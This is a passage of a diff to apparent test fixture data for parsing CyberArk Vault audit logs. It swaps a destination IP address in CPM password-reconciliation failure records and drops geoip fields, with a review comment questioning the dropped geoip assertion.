Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=5;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"(CPM)MaxRetries\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"5\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 
05:57:13\",\"IsoTimestamp\":\"2021-03-15T12:57:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=5;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"CPMDisabled\",\"Value\":\"(CPM)MaxRetries\"},{\"Name\":\"RetriesCount\",\"Value\":\"5\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813031\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", "action": "cpm reconcile password failed", 
@@ -847,17 +774,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "address": "10.0.1.20", @@ -877,7 +795,7 @@ }, "@timestamp": "2021-03-15T13:04:27.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -889,27 +807,27 @@ ], "ip": [ "10.0.1.20", - "34.123.103.115" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n", + "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n", "iso_timestamp": "2021-03-15T13:04:27Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:04:27\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:04:27Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n 
\u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.123.103.115;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615813465\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:04:27\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:04:27Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615813465\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Reconcile Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { - "address": "34.123.103.115" + "address": "67.43.156.15" }, "username": "testark" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", 
@@ -922,7 +840,7 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615813465" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", "station": "10.0.1.20", "action": "CPM Reconcile Password Failed", 
@@ -936,8 +854,8 @@ "event": { "severity": 7, "reason": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", - "ingested": "2021-06-09T10:24:36.176787Z", - "original": "\u003c7\u003e1 2021-03-15T13:04:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:04:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:04:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.123.103.115;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813465\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:04:27\",\"IsoTimestamp\":\"2021-03-15T13:04:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\n\",\"ExtraDetails\":\"address=34.123.103.115;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813465\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:08.403105900Z", + "original": "\u003c7\u003e1 2021-03-15T13:04:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:04:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:04:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n 
\u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813465\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:04:27\",\"IsoTimestamp\":\"2021-03-15T13:04:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\n\",\"ExtraDetails\":\"address=67.43.156.15;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813465\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", "action": "cpm reconcile password failed", @@ -965,17 +883,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "address": "10.0.1.20", @@ -995,7 +904,7 @@ }, "@timestamp": "2021-03-15T14:44:37.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
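Review bot: In the `@@ -965,17 +883,8 @@` hunk the regenerated expectation drops `destination.geo` outright instead of replacing the old United States lookup for 34.123.103.115 with the test-database result for 67.43.156.15, so the pipeline's geoip enrichment of `destination.ip` is no longer asserted by this test case at all. If the stack's GeoIP test database is meant to resolve 67.43.156.0/24 (which is presumably what makes it the "supported subset" named in the changelog), the expected document should carry a `"geo"` object for the new address so that an empty lookup fails the test. If the range is intentionally unresolved, a one-line note in the data stream's test config saying so would keep the next regeneration from silently re-adding or removing the block. Please confirm the absence is deliberate rather than a side effect of the geoip database being unavailable when the file was regenerated.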
@@ -1007,21 +916,21 @@ ], "ip": [ "10.0.1.20", - "34.123.103.115" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n", + "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n", "iso_timestamp": "2021-03-15T14:44:37Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:44:37\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:44:37Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n 
\u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.123.103.115;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615819476\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
